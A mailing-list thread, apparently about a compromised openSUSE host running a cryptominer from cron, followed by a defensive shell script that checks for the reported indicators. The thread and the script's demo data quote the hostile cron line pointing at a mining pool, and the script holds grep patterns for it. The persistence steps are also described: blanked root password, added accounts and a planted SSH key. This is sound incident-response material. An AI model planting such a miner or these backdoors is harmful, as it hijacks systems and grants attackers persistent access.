On 03/03/2021 14.42, James Knott wrote:
On 2021-03-03 1:48 a.m., Per Jessen wrote:
2 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -B >/dev/null
                               ^^^^^^^^^^^^^^^^^^^
That is a useful hint - it led me to this:
https://blogs.akamai.com/sitr/2020/04/a-brief-history-of-a-rootable-docker-i...
As also expected when this project first started, the docker image was a prime target for crypto-mining malware. An installation script is run via SSH that monitors the process tree with "top" - a process monitoring tool - checking for when the malware has successfully been executed. Once the process is detected, in this case it is "dhcpcd", the malware adds two new users to the system - test and test1. It changes the root password to ""(blank) and creates entries in cron to start the mining software up after a reboot. It also attempts to set the immutable bit (+i) on various files including /etc/shadow and the malware binary in /sbin/dhcpcd.
I haven't seen that. For example:

-rw-r----- 1 root shadow 1060 Mar 2 17:00 /etc/shadow
The malware also adds a .ssh key to /root/.ssh/authorized_keys:

Nothing there.
Do you allow root login via ssh? Did they attempt to login as root (check your logs)? If "yes" then perhaps your root's password is harder to guess.

--
Cheers / Saludos,
Carlos E. R.
(from 15.2 x86_64 at Telcontar)
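The checks the thread walks through (the cron entry, the blanked root password and the test/test1 accounts, root's authorized_keys, the immutable bit on /etc/shadow, PermitRootLogin, and root logins in the auth log), gathered into one triage script. This is an added example, not code from the thread, from the Akamai post or from openSUSE. Every check takes a root directory, so it can be pointed at the mount point of an image of the suspect disk as well as at / on the live host; the sample tree it builds (crontab, shadow, passwd, sshd_config, a placeholder authorized_keys entry and two auth-log lines with a documentation IP) is constructed for the demonstration. One caveat on the `ls -l` check above: `ls -l` never shows the immutable bit, only `lsattr` does, which is what the small lsattr parser is for.

```shell
#!/bin/sh
# Triage for the indicators discussed in this thread.  Added example,
# not the thread's, Akamai's or openSUSE's code.  Every check takes a
# root directory ("/" on the live host, run as root, or the mount point
# of the victim's disk image) so findings can be gathered offline.

# Cron entries resembling the quoted one: a hidden binary under /home,
# the minexmr pool name, or an xmrig-style "-o host:port" argument.
# Covers the SUSE (tabs), Debian (crontabs) and RHEL spool layouts.
check_cron() {
    root=$1
    for f in "$root"/etc/crontab "$root"/etc/cron.d/* "$root"/var/spool/cron/* \
             "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/tabs/*; do
        [ -f "$f" ] || continue
        grep -nE '(/home/[^ ]+/\.[^ /]+|minexmr|[[:space:]]-o[[:space:]]+[^ ]+:[0-9]+)' "$f" \
            | sed "s|^|$f:|"
    done
}

# Empty password field in shadow (the post says root's is blanked) and
# the two account names the malware creates.
check_accounts() {
    root=$1
    [ -r "$root/etc/shadow" ] && awk -F: '$2 == "" { print "empty password: " $1 }' "$root/etc/shadow"
    [ -r "$root/etc/passwd" ] && awk -F: '$1 == "test" || $1 == "test1" { print "suspect account: " $0 }' "$root/etc/passwd"
    return 0
}

# Keys in root's authorized_keys (type and trailing comment), skipping
# comment and blank lines.
check_root_keys() {
    k="$1/root/.ssh/authorized_keys"
    [ -s "$k" ] || return 0
    awk '$0 !~ /^[[:space:]]*#/ && NF { print "root key: " $1 " " $NF }' "$k"
}

# Carlos's question: may root log in with a password?  OpenSSH has
# defaulted to prohibit-password since 7.0, so only an explicit
# "PermitRootLogin yes" exposes root to the guessing seen in the logs.
check_sshd() {
    c="$1/etc/ssh/sshd_config"
    [ -r "$c" ] || return 0
    grep -inE '^[[:space:]]*PermitRootLogin[[:space:]]+yes' "$c" | sed 's/^/sshd_config:/'
}

# Root logins over ssh, accepted and failed, from a syslog-format auth
# log (on openSUSE 15.x, "journalctl -u sshd" produces such lines).
check_auth_log() {
    [ -r "$1" ] || return 0
    awk '/sshd\[[0-9]+\]: (Accepted|Failed) [a-z]+ for root from/ {
            for (i = 1; i <= NF; i++)
                if ($i == "Accepted" || $i == "Failed")
                    print $i, $(i+1), "for root from", $(i+5)
         }' "$1"
}

# ls -l never shows chattr flags; lsattr prints them as a flag field
# before the path, where "i" is the immutable bit.  Parse one lsattr
# line (paths containing spaces are not handled).
immutable_from_lsattr() {
    printf '%s\n' "$1" | awk '{ if (index($1, "i") > 0) print "immutable: " $2 }'
}
# Live host only: needs lsattr from e2fsprogs.
check_immutable() {
    for f in "$@"; do
        line=$(lsattr -d "$f" 2>/dev/null) || continue
        immutable_from_lsattr "$line"
    done
}

# Constructed sample tree reproducing the indicators (placeholder key,
# documentation IP); not taken from any real host.
demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/ssh" "$d/var/spool/cron/tabs" "$d/root/.ssh" "$d/var/log"
    printf '2 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -B >/dev/null\n' > "$d/var/spool/cron/tabs/test"
    printf 'root::18689:0:99999:7:::\nsshd:!:18600:0:99999:7:::\n' > "$d/etc/shadow"
    printf 'root:x:0:0:root:/root:/bin/bash\ntest:x:1001:100::/home/test:/bin/bash\ntest1:x:1002:100::/home/test1:/bin/bash\n' > "$d/etc/passwd"
    printf 'PermitRootLogin yes\n' > "$d/etc/ssh/sshd_config"
    printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYFORTHISDEMO attacker@example\n' > "$d/root/.ssh/authorized_keys"
    printf '%s\n' 'Mar  2 16:57:40 host sshd[2201]: Failed password for root from 203.0.113.7 port 41200 ssh2' \
                  'Mar  2 16:58:01 host sshd[2211]: Accepted password for root from 203.0.113.7 port 41234 ssh2' \
        > "$d/var/log/auth.log"
    printf '%s\n' "$d"
}

# Run all file-based checks against one root directory.
audit() {
    check_cron "$1"; check_accounts "$1"; check_root_keys "$1"; check_sshd "$1"
    check_auth_log "$1/var/log/auth.log"
}

# Demo against the constructed tree; see the usage note for a live host.
ROOT=$(demo_tree)
audit "$ROOT"
immutable_from_lsattr '----i---------e------- /etc/shadow'
[ -n "$ROOT" ] && rm -rf "$ROOT"
```

On the live host, run `audit /` as root and add `check_immutable /etc/shadow /sbin/dhcpcd`; on a mounted image, `audit /mnt/victim`. If lsattr reports `i` on a file, `chattr -i` it before trying to change it, since even root cannot edit it until the flag is cleared.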